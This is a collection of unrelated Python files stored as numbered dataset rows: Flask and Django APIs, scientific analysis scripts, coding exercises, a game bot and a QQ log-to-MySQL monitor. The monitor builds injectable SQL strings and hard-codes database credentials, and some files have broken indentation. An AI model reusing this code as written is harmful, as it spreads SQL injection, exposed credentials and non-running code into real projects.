        #print("args:",request.args.get)
        #email = request.args.get('email')
        print("email:",email)
        return UserModel.get_by_email(email)
    '''
    def get(self):
        """Return all stored users as JSON."""
        return {"users": [x.json() for x in UserModel.get_list()]}

    def post(self):
        """Create a user from the JSON request body.

        Expects keys: nameu, email, pwd, admin.
        Fix: previously returned None (HTTP 200 with a null body) when
        save_to_db() failed; now reports the failure explicitly.
        """
        request_data = request.get_json()
        user = UserModel(None,
                         request_data['nameu'],
                         request_data['email'],
                         request_data['pwd'],
                         request_data['admin'])
        if user.save_to_db():
            return "User successfully added"
        return "User could not be added", 500
|
22,048 | bdc013deb5a2256fb2e47465b08a77ec4371a50c | """Handles all API requests.""" |
22,049 | d51c7604ab5e0f79e81073a1685461b48528019d | from enum import Enum
import abc
from .Ingredient import *
class PizzaType(Enum):
    """Enumerates the pizza kinds the factory can produce."""
    CHEESE_PIZZA = 0
class Pizza(metaclass=abc.ABCMeta):
    """Abstract pizza: holds its extra ingredients; subclasses name
    themselves and render their ingredient list."""

    def __init__(self, ingredients:list[Ingredient]) -> None:
        # Extra ingredients beyond whatever the concrete subclass adds.
        self.ingredients = ingredients

    @abc.abstractmethod
    def getName(self) -> str:
        """Return the display name of this pizza."""
        return NotImplemented

    @abc.abstractmethod
    def showIngredients(self) -> str:
        """Return a human-readable, comma-separated ingredient list."""
        return NotImplemented
class CheesePizza(Pizza):
    """Pizza variant that additionally carries a Cheese component."""

    def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
        super().__init__(ingredients)
        self.cheese = cheese
class CheesePizzeOfStoreA(CheesePizza):
    """Store A's concrete cheese pizza."""

    def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
        super().__init__(cheese, ingredients)

    def getName(self) -> str:
        return "store A cheese pizze"

    def showIngredients(self) -> str:
        """Cheese first, then each extra ingredient, comma-separated."""
        parts = [self.cheese.getInfo()]
        parts.extend(item.getInfo() for item in self.ingredients)
        return ", ".join(parts)
class CheesePizzeOfStoreB(CheesePizza):
    """Store B's concrete cheese pizza."""

    def __init__(self, cheese:Cheese, ingredients:list[Ingredient]) -> None:
        super().__init__(cheese, ingredients)

    def getName(self) -> str:
        return "store B cheese pizze"

    def showIngredients(self) -> str:
        """Cheese first, then each extra ingredient, comma-separated."""
        parts = [self.cheese.getInfo()]
        parts.extend(item.getInfo() for item in self.ingredients)
        return ", ".join(parts)
|
22,050 | 47bfca0c8044b0367adb966bdb898518b917112e | # -*- coding: UTF-8 -*-
#从sklearn.datasets里导入手写体数字加载器
from sklearn.datasets import load_digits
#从通过数据加载器活得手写体数字的数码图像数据并存储在digits变量中
digits = load_digits()
print digits.data.shape
# 使用sklearn.model_selection里的train_test_split模块切分数据集,得到训练集和测试集
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(digits.data, digits.target, test_size=0.25, random_state=33)
print y_train
# 从sklearn.preprocessing里导入数据标准化模块
from sklearn.preprocessing import StandardScaler
# 从sklearn.svm里导入基于现行假设的支持向量机分类器LinearSVC
from sklearn.svm import LinearSVC
# 对训练集和测试集进行标准化
ss=StandardScaler()
X_train = ss.fit_transform(X_train)
X_test = ss.transform(X_test)
#初始化线性假设的支持向量机分类器LinearSVC
lsvc = LinearSVC()
lsvc.fit(X_train,y_train)
#利用训练好的模型对测试数据集进行预测
y_predict = lsvc.predict(X_test)
#############################性能评估#################################3
#使用模型自带的评估函数进行准确性测评
print 'Accutacy of LinearSVC is:', lsvc.score(X_test,y_test)
# 使用sklearn.metric里面的classification_report模块对预测结果作更加详细的分析
from sklearn.metrics import classification_report
print classification_report(y_test,y_predict,target_names=digits.target_names.astype(str))
|
22,051 | 090416bc983ada5e590564f11aeaaeb64ca6ac5c | def ones(s):
b = bin(s)
b = b[2:]
c=0
n = len(b)
for i in range(n):
if b[i]=="1":
c+=1
return c
# For each of t input numbers (read as strings), print the maximum
# popcount over all decimal prefixes of the number.
t = int(input())
for k in range(t):
    a = input()
    n = len(a)
    c = 0
    # NOTE(review): each prefix is re-parsed and ones() is called twice per
    # prefix, giving roughly quadratic work in the digit count -- fine for
    # small inputs, but worth revisiting for long numbers.
    for j in range(0,n,1):
        b = a[:j+1]
        if c<=ones(int(b)):
            c = ones(int(b))
    print(c)
|
22,052 | d8b5650b0ac652508b0217578d2b320ef3693699 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import os
plt.style.use('y1a1')
matplotlib.rcParams['text.usetex']=False
import treecorr
colnames = {'shear' : ('shear_1', 'shear_2'), 'ellipticity' : ('ellipticity_1', 'ellipticity_2'), 'ellipticity_true' : ('ellipticity_1_true', 'ellipticity_2_true')}
class corrfns:
def compute_shear_shear(self, i, j, cat1, cat2):
    """Compute the shear-shear correlations xi+/xi- between tomographic
    bins *i* of cat1 and *j* of cat2 with treecorr.

    Returns (theta, xip, xim, xiperr, ximerr); theta in arcmin (bin mean).
    Reads self.p1/self.p2 (per-object bin assignments) and self.corrtype
    to pick the shear column names via the module-level `colnames` map.
    """
    maski = (cat1.mask) & (self.p1==i)
    maskj = (cat2.mask) & (self.p2==j)
    # Initialised the catlogues
    namei_1,namei_2 = colnames[self.corrtype[0]]
    cat_i = treecorr.Catalog(g1=cat1.cols[namei_1][maski], g2=cat1.cols[namei_2][maski], ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
    namej_1,namej_2 = colnames[self.corrtype[1]]
    cat_j = treecorr.Catalog(g1=cat2.cols[namej_1][maskj], g2=cat2.cols[namej_2][maskj], ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
    # Set up the correlation
    # Note that we're using the binning configuration from
    # the first of the two config files
    # might be good to check and give a warning if the two files
    # specify different 2pt binning parameters
    gg = treecorr.GGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
    # And process it
    gg.process(cat_i,cat_j)
    theta = np.exp(gg.meanlogr)
    xip = gg.xip
    xim = gg.xim
    # Same variance estimate serves both xi+ and xi-.
    xiperr = ximerr = np.sqrt(gg.varxi)
    return theta, xip, xim, xiperr, ximerr
def compute_position_shear(self, i, j, cat1, cat2):
    """Compute tangential shear (galaxy-galaxy lensing) between lens bin
    *i* of cat1 and source bin *j* of cat2.

    Subtracts the random-point signal via treecorr's calculateXi(rg).
    Returns (theta, gammat, gammat_im, gammaterr, gammaterr).
    """
    maski = (cat1.mask) & (self.p1==i)
    maskj = (cat2.mask) & (self.p2==j)
    # Initialised the catlogues
    cat_i = treecorr.Catalog(ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
    # NOTE(review): the randoms are masked with the galaxy-catalogue mask
    # (same indexing) -- assumes rcat1 rows align with cat1; confirm.
    rcat_i = treecorr.Catalog(ra=self.rcat1['ra'][maski], dec=self.rcat1['dec'][maski], ra_units='deg', dec_units='deg')
    namej_1,namej_2 = colnames[self.corrtype[1]]
    cat_j = treecorr.Catalog(g1=cat2.cols[namej_1][maskj], g2=cat2.cols[namej_2][maskj], ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
    # Set up the correlation
    ng = treecorr.NGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
    rg = treecorr.NGCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
    # And process it
    ng.process(cat_i,cat_j)
    rg.process(rcat_i,cat_j)
    # calculateXi subtracts the randoms' signal from the data signal.
    gammat, gammat_im, gammaterr = ng.calculateXi(rg)
    theta = np.exp(ng.meanlogr)
    gammaterr = np.sqrt(gammaterr)
    return theta, gammat, gammat_im, gammaterr, gammaterr
    def compute_position_position(self, i, j, cat1, cat2):
        """Measure the angular clustering w(theta) between cat1 positions
        (bin i) and cat2 positions (bin j) with the Landy-Szalay estimator.

        Returns (theta [arcmin], w, zeros, w_err, zeros); zero arrays pad the
        tuple so its shape matches the other compute_* methods.
        """
        maski = (cat1.mask) & (self.p1==i)
        maskj = (cat2.mask) & (self.p2==j)
        # Subsample the random catalogues (without replacement) to the same
        # size as the corresponding data selections.
        rmaski = np.random.choice(self.rcat1['ra'].size, size=maski[maski].size, replace=False)
        rmaskj = np.random.choice(self.rcat2['ra'].size, size=maskj[maskj].size, replace=False)
        # Initialised the catlogues
        cat_i = treecorr.Catalog(ra=cat1.cols['ra'][maski], dec=cat1.cols['dec'][maski], ra_units='deg', dec_units='deg')
        cat_j = treecorr.Catalog(ra=cat2.cols['ra'][maskj], dec=cat2.cols['dec'][maskj], ra_units='deg', dec_units='deg')
        rancat_i = treecorr.Catalog(ra=self.rcat1['ra'][rmaski], dec=self.rcat1['dec'][rmaski], ra_units='deg', dec_units='deg')
        rancat_j = treecorr.Catalog(ra=self.rcat2['ra'][rmaskj], dec=self.rcat2['dec'][rmaskj], ra_units='deg', dec_units='deg')
        # Trigger a warning if the random catalogues differ significantly from
        # the main catalogues in size
        checki = (abs(cat_i.x.size - rancat_i.x.size) * 1./cat_i.x.size)>0.25
        checkj = (abs(cat_j.x.size - rancat_j.x.size) * 1./cat_j.x.size)>0.25
        if checki or checkj:
            print("Warning: there are either significantly more or fewer randoms than actual galaxies in one or both samples.")
        # Set up the correlation
        nn = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
        # And process it
        nn.process(cat_i,cat_j)
        # Data-random, random-data and random-random pair counts needed by
        # the Landy-Szalay estimator w = (DD - DR - RD + RR) / RR.
        nr = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
        rn = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
        rr = treecorr.NNCorrelation(nbins=cat1.info['tbins'], min_sep=cat1.info['tmin'], max_sep=cat1.info['tmax'], sep_units='arcmin', bin_slop=0.1, verbose=True,num_threads=1)
        nr.process(cat_i,rancat_j)
        rn.process(rancat_i,cat_j)
        rr.process(rancat_i,rancat_j)
        wtheta,wthetaerr = nn.calculateXi(rr,dr=nr,rd=rn)
        theta = np.exp(nn.meanlogr)
        # varxi -> standard error.
        wthetaerr = np.sqrt(wthetaerr)
        return theta, wtheta, np.array([0]*len(theta)), wthetaerr, np.array([0]*len(theta))
|
22,053 | f376bb8bfd04971edebf054cd16303336786e24e | n = int(input())
A = [int(x) for x in input().split(" ")]
m = int(input())
B = [int(x) for x in input().split(" ")]
#Returns a dict using as keys the value of each of the arrays and as value the number of times that it repeats on that array
def to_dict(arr):
    """Count occurrences of each value in *arr*; returns {value: count}."""
    counts = {}
    for item in arr:
        counts[item] = counts.get(item, 0) + 1
    return counts
def look_for_differences(dict_a, dict_b):
    """Return the keys of dict_a whose counts differ from dict_b.

    Every key of dict_a is assumed to exist in dict_b (problem constraint),
    so no existence check is performed.
    """
    mismatched = []
    for key, count in dict_a.items():
        if dict_b[key] != count:
            mismatched.append(key)
    return mismatched
dict_a = to_dict(A)
dict_b = to_dict(B)
differences = look_for_differences(dict_a, dict_b)
print(' '.join(map(str,differences))) |
def arr(n):
    """Return how many distinct values occur exactly twice in *n*."""
    from collections import Counter
    return sum(1 for count in Counter(n).values() if count == 2)
print(arr(['tom','jerry','doramon','jerry','rat','tom','rat','rat']))
|
22,055 | 681e74391cf8e20280217b50127769437fb8ad01 | import numpy as np
import argparse
from standards import *
import loc_utils as lut
parser = argparse.ArgumentParser()
parser.add_argument('x', help='puts 3 predictors separated by "/" into the data table')
parser.add_argument('-s', '--save_to', help='pickles and saves preprocessed data to path provided')
parser.add_argument('-o', '--output_df', help='prints a pandas DF to stdout', action='store_true')
ARGS = parser.parse_args()
def main():
s = SURix()
data = lut.unpickle('open_loop_data/SUR_data_2.pkl')
data = lut.unpickle('open_loop_data/temp.pkl') # TODO delete later
# Separate data of each batch (group x condition)
sep_data = [] # order: 0,0; 0,1; 1,0; 1,1
for grp_ind in [0,1]:
for cnd_ind in [0,1]:
bix = np.all([
data[:, s.ix('group')] == grp_ind,
data[:, s.ix('cond')] == cnd_ind
], axis=0)
sep_data.append(data[bix,:])
# 1. For each subject and each **TASK** within a subject, add a y value encoding whether their free trial choice
# was the same as the **TASK**.
# 2. Reorder each batch by task
for i, grp in enumerate(sep_data):
y = np.array([grp[:, s.ix('task')]==grp[:, s.ix('choice')]])
aug = np.concatenate([grp, y.reshape(-1, 1)], axis=1)
ordix = np.argsort(aug[:, s.ix('task')])
sep_data[i] = aug[ordix]
s.cols.append('y')
num_rows = np.sum([grp.shape[0] for grp in sep_data])
X = np.zeros([num_rows, 48])
tasks = lut.get_unique(data, s.ix('task'))
start = 0
x1, x2, x3 = ARGS.x.split(sep='/')
for i, grp in enumerate(sep_data):
for j, tsk in enumerate(tasks):
mask = lut.get_mask(grp, {s.ix('task'): tsk})
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+0] = grp[mask, s.ix(x1)]
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+1] = grp[mask, s.ix(x2)]
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+2] = grp[mask, s.ix(x3)]
start += int(grp.shape[0] / len(tasks))
Y = np.concatenate([d[:, -1] for d in sep_data], axis=0).reshape(-1, 1)
print(Y)
D = np.concatenate([Y, np.ones_like(Y), X], axis=1)
c = ['Y', 'const']
for grp in ['F', 'S']:
for cnd in ['I+', 'I-']:
for tsk in ['1D', 'I1D', '2D', 'R']:
for iv in ['PC', 'LP', 'LRN']:
c.append('{}:{}:{}:{}'.format(iv,tsk,cnd,grp))
if ARGS.save_to: lut.dopickle(ARGS.save_to, D)
if ARGS.output_df: lut.print_arr(D, c, nonints=c[1:], round_=2)
if __name__=='__main__': main() |
22,056 | a4238ecca3288b9499c7e740e4772ca676cc2e86 | from musics.models import Music
from musics.serializers import musicSerializer
from rest_framework import viewsets
# Authentications
from rest_framework.permissions import IsAuthenticated
# Parser
from rest_framework.parsers import JSONParser
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from rest_framework.decorators import detail_route, list_route
# Create your views here.
class MusicViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for Music plus two custom read-only routes.

    NOTE(review): detail_route/list_route are deprecated in DRF in favour of
    @action(detail=True/False) and were removed in DRF 3.10 -- confirm
    against the pinned DRF version before upgrading.
    """
    queryset = Music.objects.all()
    serializer_class = musicSerializer
    # DRF Authentications
    permission_classes = (IsAuthenticated,)
    # Allowed content type
    # local setting (just in this class)
    # parser_classes = (JSONParser,)

    # /api/music/{pk}/detail/
    # @detail_route(methods=['get'], url_path='detail_self')
    @detail_route(methods=['get'])
    def detail(self, request, pk=None):
        """Return only the singer and song of a single Music record."""
        music = get_object_or_404(Music, pk=pk)
        result = {
            'singer': music.singer,
            'song': music.song
        }
        return Response(result, status=status.HTTP_200_OK)

    @list_route(methods=['get'])
    def all_singer(self, request):
        """Return the distinct list of singers across all records."""
        music = Music.objects.values_list('singer', flat=True).distinct()
        return Response(music, status=status.HTTP_200_OK)
|
22,057 | 9841b87f9f5c6b197d8ca6fa185490e74f8a3857 | refresh = 43200
version = 20161106.01
urls = ['http://www.motors-dz.com/']
regex = [r'^https?:\/\/[^\/]*motors-dz\.com']
videoregex = []
liveregex = [] |
22,058 | 752d6331fd19be10df3ac63348c4b22c0de6cd2b | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def levelOrderBottom(self, root):
        """
        Bottom-up level-order traversal: collect node values level by level,
        then reverse so the deepest level comes first.

        :type root: TreeNode
        :rtype: List[List[int]]
        """
        if root is None:
            return []
        levels = []
        frontier = [root]
        while frontier:
            levels.append([node.val for node in frontier])
            children = []
            for node in frontier:
                if node.left:
                    children.append(node.left)
                if node.right:
                    children.append(node.right)
            frontier = children
        levels.reverse()
        return levels
22,059 | 8792ff4df0286f97f5579ad775a9453d06c94ea9 | import logging
import math
from typing import Callable, Dict, List, Tuple, Union, NamedTuple
import numpy as np
from collections import defaultdict
class Choice(NamedTuple):
flavors: List[int]
max_depth: int
index: Tuple[int, int]
def generate_choices(top_layer: np.ndarray, curr_level: np.ndarray) -> "List[Choice]":
    """Enumerate every 2x2 scoop position and the flavors it would remove.

    For each 2x2 window the scoop takes the cells sitting at the window's
    maximum height; a window whose four cells are all empty (height -1) is
    skipped entirely.
    """
    choices = []
    offsets = [(0, 0), (0, 1), (1, 0), (1, 1)]
    for row in range(top_layer.shape[0] - 1):
        for col in range(top_layer.shape[1] - 1):
            heights = [curr_level[row + dx][col + dy] for dx, dy in offsets]
            top = max([-1] + heights)
            if top == -1:
                continue
            flavors = [top_layer[row + dx][col + dy]
                       for (dx, dy), height in zip(offsets, heights)
                       if height == top]
            choices.append(Choice(flavors, top, (row, col)))
    return choices
def choose_next_player(now_turn: int, possible_players: List[int], served_situation: List[Dict[int, int]],
top_layer: np.ndarray, curr_level: np.ndarray, rng: np.random.Generator,
player_idx: int, my_flavor_preference: List[int], total_players: int) -> int:
if len(possible_players) == 1:
return possible_players[0]
# if now_turn = 0, it means for the first turn, we just randomly choose a person to pass to
if now_turn == 0 and len(possible_players) != 0:
return rng.choice(possible_players)
# if there are no candidates, which means our team is the last one to serve
if len(possible_players) == 0:
possible_players = [i for i in range(total_players) if i != player_idx]
choices = generate_choices(top_layer, curr_level)
# if all ice cream has been taken
if len(choices) == 0:
return rng.choice(list(possible_players))
greedy_flavor_preference = defaultdict(list)
for player_index in possible_players:
player_served_situation = sorted(served_situation[player_index].items(), key=lambda item: -item[1])
for flavor, _ in player_served_situation:
greedy_flavor_preference[player_index].append(flavor)
max_score = -math.inf
next_player_list = []
total_units = 24
# test weighted = 0.01, 0.1, 0.5, 0.8, 1 and find the performance of 0.5 is the best
# although I don't know why, but I guess we can test it for several rounds later
weighted = 0.5
for player_index, flavor_preference in greedy_flavor_preference.items():
score_list = []
for choice in choices:
score_list.append((score(choice, flavor_preference), len(choice.flavors)))
score_list.sort(key=lambda x: -x[0])
remain = total_units
player_max_score = 0
for score_num, count in score_list:
if remain - count < 0:
break
remain -= count
player_max_score += score_num
player_max_score = player_max_score / (total_units - remain) \
+ weighted * difference(my_flavor_preference, flavor_preference)
if max_score < player_max_score:
max_score = player_max_score
next_player_list = [player_index]
elif max_score == player_max_score:
next_player_list.append(player_index)
# if len(next_player_list) == 1, just return,
# if the length is larger than 1, we may choose randomly choose a from the set
if len(next_player_list) == 1:
return list(next_player_list)[0]
return rng.choice(list(next_player_list))
# copy from the below f function
def score(choice: "Choice", flavor_preference) -> float:
    """Heuristic desirability of a scoop for a player: the (negated) mean
    preference rank of its flavors, plus small bonuses for scoop depth and
    for the number of units removed."""
    num_flavors = len(choice.flavors)
    rank_penalty = sum(flavor_preference.index(flavor) for flavor in choice.flavors)
    return -rank_penalty / num_flavors + choice.max_depth * 0.2 + 0.01 * num_flavors
def difference(my_flavor_preference: List[int], other_flavor_preference: List[int]) -> float:
    """Mean absolute displacement of each flavor's rank between two
    preference orderings (0.0 means the orderings are identical)."""
    total = sum(
        abs(rank - other_flavor_preference.index(flavor))
        for rank, flavor in enumerate(my_flavor_preference)
    )
    return total / len(my_flavor_preference)
class Player:
def __init__(self, flavor_preference: List[int], rng: np.random.Generator, logger: logging.Logger) -> None:
self.flavor_preference = flavor_preference
self.rng = rng
self.logger = logger
self.state = [0]
group_id = 1
self.group_id = group_id - 1
def serve(self, top_layer: np.ndarray, curr_level: np.ndarray, player_idx: int,
get_flavors: Callable[[], List[int]], get_player_count: Callable[[], int],
get_served: Callable[[], List[Dict[int, int]]], get_turns_received: Callable[[], List[int]]
) -> Dict[str, Union[Tuple[int, int], int]]:
remain = 24 - self.state[-1]
choices = generate_choices(top_layer, curr_level)
choices = list(filter(lambda x: len(x.flavors) <= remain, choices))
self.logger.info(choices)
if not choices:
turns = get_turns_received()
total_players = get_player_count()
players = list()
for idx, turn in enumerate(turns):
if turn == min(turns) and idx != player_idx:
players.append(idx)
self.state.append(0)
# if we choose the person with the highest score
next_player = choose_next_player(min(turns), players, get_served(), top_layer, curr_level, self.rng,
player_idx, self.flavor_preference, total_players)
return dict(action="pass", values=next_player)
# if we just randomly choose one person
# if len(players) == 0:
# players = [i for i in range(total_players) if i != player_idx]
# return dict(action="pass", values=self.rng.choice(players))
def f(choice: Choice) -> float:
res = 0
for flavor in choice.flavors:
res -= self.flavor_preference.index(flavor)
res /= len(choice.flavors)
# it seems that max_depth does have a positive impact on scoring after testing,
# but we should still test weight = 0.2
res += choice.max_depth * 0.2
res += 0.01 * len(choice.flavors)
return res
choice = max(choices, key=f)
self.state[-1] += len(choice.flavors)
return dict(action='scoop', values=choice.index)
|
22,060 | 46ba92b079b300b390a868ae71482419ebb82742 | #!/usr/bin/python
# encoding=utf-8
import MySQLdb
from subprocess import Popen, PIPE
import sys
logFile = '~/webqq.log'
def format_data(data):
    """Parse one webqq log line into [datetime, group, person, msg].

    Only lines that are NOT '[info]' lines and that carry the group-message
    marker ('群消息') are accepted; every other line yields [].
    """
    try:
        idx = data.find('[info]')
        if idx == -1:
            # Fixed-width prefix: characters 1-17 hold the timestamp and the
            # payload starts at character 20.  NOTE(review): these offsets
            # assume the exact log layout of this webqq build -- verify
            # against a sample line.
            dt = data[1:18]
            msg = data[20:]
            # Strip ANSI colour escape remnants.
            msg = msg.replace('[36m', '').replace('[0m', '').strip()
            if msg.find('群消息') == 2:
                # Skip the fixed-length message header; the remainder is
                # expected to look like 'person|group:text'.
                msg = msg[14:]
                grp_person = msg.split('|')
                person = grp_person[0]
                if grp_person[1]:
                    gp = grp_person[1].split(':')
                    if gp:
                        grp = gp[0]
                        if gp[1]:
                            msg = gp[1]
                        else:
                            # Group present but empty message body.
                            msg = ''
                        return [dt, grp, person, msg]
                    else:
                        return []
                else:
                    return []
            else:
                return []
        else:
            return []
    except:
        # NOTE(review): the bare except makes parsing best-effort -- any
        # malformed line is logged and skipped instead of crashing the
        # tail loop; consider narrowing to (IndexError, ValueError).
        print(">>>> %s " % data)
        return []
def gen_sql(data):
    """Build an INSERT statement for a parsed log record.

    *data* is [msg_dt, grp, member, msg] as produced by format_data;
    returns None for an empty/falsy record.

    SECURITY NOTE(review): values are interpolated directly into the SQL
    string -- a message containing a single quote breaks the statement and
    the query is injectable.  Prefer returning (sql, params) and executing
    with cursor.execute(sql, params).
    """
    if data:
        d = data
        return "insert into qqmsg (msg_dt,grp,member, msg) values('{0}','{1}','{2}','{3}')".format(d[0], d[1], d[2], d[3])
    else:
        return None
def exec_sql(sql):
    """Execute *sql* against the immsg database, committing on success and
    rolling back on a database error.

    The connection is always closed, even when execute/commit raises an
    unexpected exception (previously close was skipped in that case).
    """
    # NOTE(review): credentials are hard-coded; move them to configuration
    # or environment variables.
    db = MySQLdb.connect("47.98.56.206", "root", "123456", "immsg", charset='utf8')
    try:
        cursor = db.cursor()
        try:
            cursor.execute(sql)
            db.commit()
        except MySQLdb.Error as e:
            # Narrowed from a bare except: only database errors trigger a
            # rollback, and the error itself is surfaced for debugging.
            print('Err on commit to database !!')
            print(e)
            db.rollback()
    finally:
        db.close()
def monitor_log(log):
reload(sys)
sys.setdefaultencoding('utf8')
p = Popen('tail -3f ' + log, stdout=PIPE, stderr=PIPE, shell=True)
pid = p.pid
print("Popen pid: %s" % str(pid))
while True:
line = p.stdout.readline()
if line:
data = format_data(line)
if data:
# print(data)
sql = gen_sql(data)
if sql:
exec_sql(sql)
else:
print('No data is received!!')
if __name__ == '__main__':
monitor_log(logFile)
|
22,061 | 3b86f1f3c6a834c8de52968c20481fffb9eda388 |
print ("hi welcome to my bookshop!")
print ("/n")
running=True
while running==True:
print ("1 add a book title.")
print ("2 edit an existing book title.")
print ("3 delete a book title.")
print ("4 end the programme.")
command=input ("please enter 1, 2, 3, or bye" ,)
if command==("1"):
print ("please enter what book title you want to add")
elif command==("2"):
print("please enter the book title you want to edit")
elif command==("3"):
print ("please enter the book title you want to delete")
elif command==("4"):
print ("goodbye")
running=False
else:
print ("you didnt enter anything please enter what you want to do")
|
22,062 | c8c740d29298f4ea38a2c572a0f6b246134c28c1 | from hashlib import new
from django.db import models
from datetime import datetime
from django.contrib.auth.models import User, auth
from django.forms.models import ModelFormOptions, model_to_dict
import random
# Create your models here.
# python manage.py makemigrations
# python manage.py migrate
# python manage.py runserver
class topic(models.Model):
topic_name = models.CharField(max_length=255)
class exercise(models.Model):
name = models.CharField(max_length=255)
description = models.TextField()
image = models.ImageField(upload_to='media/exercise_icon', null=True)
topic = models.ForeignKey(topic, on_delete=models.CASCADE, null=True)
created_date = models.DateField(auto_now=True, auto_now_add=False)
created_by = models.ForeignKey(User, on_delete=models.CASCADE)
class condition(models.Model):
key = models.CharField(max_length=15, null=True)
limit = models.IntegerField(null=True)
query = models.CharField(max_length=255)
class question_element(models.Model):
label = models.CharField(max_length=255)
key = models.CharField(max_length=255)
symbol = models.CharField(max_length=255)
nature = models.CharField(max_length=255)
data_type = models.CharField(max_length=255)
value = models.CharField(max_length=255)
is_random = models.BooleanField(default=False)
conditions = models.ManyToManyField(condition, null=True)
example_value = models.CharField(max_length=255)
def get_joined_condition_list(self):
condition_list = self.conditions.all()
new_list = []
for i in condition_list:
single_string = f'NUMBER {i.key} {i.limit}'
new_list.append(single_string)
condition_string = " and ".join(new_list)
return condition_string
class question(models.Model):
title = models.CharField(max_length=255)
description = models.TextField()
topic = models.ForeignKey(topic, on_delete=models.CASCADE, null=True)
exercise = models.ForeignKey(exercise, on_delete=models.CASCADE, null=True)
question_elements = models.ManyToManyField(question_element)
criteria = models.CharField(max_length=255, null=True)
loop = models.IntegerField(null=True)
success_message = models.TextField(null=True)
failure_message = models.TextField(null=True)
is_completed = models.BooleanField(default=False)
created_by = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
def get_correct_random_value(self, condition):
temp_con = ""
while True:
random_value = random.randint(0, 500)
temp_con = condition.replace("NUMBER", str(random_value))
if eval(temp_con):
return random_value
def get_question_versions(self):
container = []
for i in range(self.loop):
data = {'s_no': i+1}
temp_expression = self.criteria
for single_question_element in self.question_elements.all():
if single_question_element.is_random:
my_all_conditions = single_question_element.get_joined_condition_list()
value = self.get_correct_random_value(my_all_conditions)
# print(value)
# for single_condition in single_question_element.conditions.all():
# print(i + 1)
# my_condition = model_to_dict(single_condition)
# whole_query = f'{} {my_condition['key']} {my_condition['limit']}'
# print(my_condition)
else:
value = single_question_element.value if single_question_element.value else f'{single_question_element.symbol}?'
temp_expression = temp_expression.replace(
single_question_element.symbol,
str(value)
)
data['expression'] = temp_expression
container.append(data)
return container
# print(container)
|
22,063 | 2cdc643be8d2f845ca09a8c2b1b6c5948b0b5526 | import argparse
import re
from datetime import datetime
from cli.models.models import CliData, PHONE, LOGIN, PASSWORD, SIP_DEVICE, \
SIP_ENABLED, IDENTIFY_LINE
from cli.utils.help_message import *
CHOICE_FILTER = ['all', 'activate', 'deactivate']
CHOICE_ACTION = ['a', 'd']
CHOICE_VIEW = [PHONE, LOGIN, PASSWORD, SIP_DEVICE, SIP_ENABLED, IDENTIFY_LINE]
class NumsAction(argparse.Action):
"""
A class for extended handler input nums, it converts bash-string
separated by spaces or \n in the list.
"""
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(NumsAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, re.split('\n| ', values))
def arg_parse() -> CliData:
time_fmt = "%Y-%m-%d_%H-%M"
timestamp = datetime.strftime(datetime.now(), format=time_fmt)
filename = f'vats_{timestamp}.xlsx'
arg_engine = argparse.ArgumentParser(prog='cli')
arg_engine.add_argument("-f",
type=str,
nargs='?',
const=filename,
default=None,
dest='filename',
help=HELP_F)
arg_engine.add_argument("-l",
action="store_false",
dest='display',
help=HELP_L)
arg_engine.add_argument("-v",
type=str,
nargs='+',
help=HELP_V,
default=['all', ],
dest='view',
choices=CHOICE_VIEW)
arg_engine.add_argument("--action",
type=str,
nargs='+',
default=None,
dest='action',
choices=CHOICE_ACTION,
help=HELP_ACTION)
arg_engine.add_argument("--login",
type=str,
dest='login',
required=True,
help=HELP_LOGIN)
arg_engine.add_argument("--nums",
type=str,
nargs='+',
dest="nums",
action=NumsAction,
help=HELP_NUMS)
arg_engine.add_argument("--filter",
nargs='?',
default='all',
dest='filter',
choices=CHOICE_FILTER,
help=HELP_FILTER)
args = arg_engine.parse_args()
cli_data = CliData(**vars(args))
return cli_data
|
22,064 | 8982a9eb8b55e1acb294ab4f5c05ba042eb86608 | # -*- coding: utf-8 -*-
from pyfcm import FCMNotification
from sensorsapi import app
from models import *
from flask import jsonify, request, render_template, url_for, redirect
import os
@app.route('/', methods=['GET'])
def index():
return redirect(url_for('list_entries'))
@app.route('/api/entries', methods=['GET'])
def get_entries():
entries = []
for entry in SensorsEntry.query.order_by(SensorsEntry.timestamp.asc()):
entries.append(entry.export_data())
return jsonify({'entries': entries})
@app.route('/api/latest', methods=['GET'])
def get_latest_entries():
last_entries = []
for entry in SensorsEntry.query.order_by(SensorsEntry.timestamp.desc()).limit(10):
last_entries.append(entry.export_data())
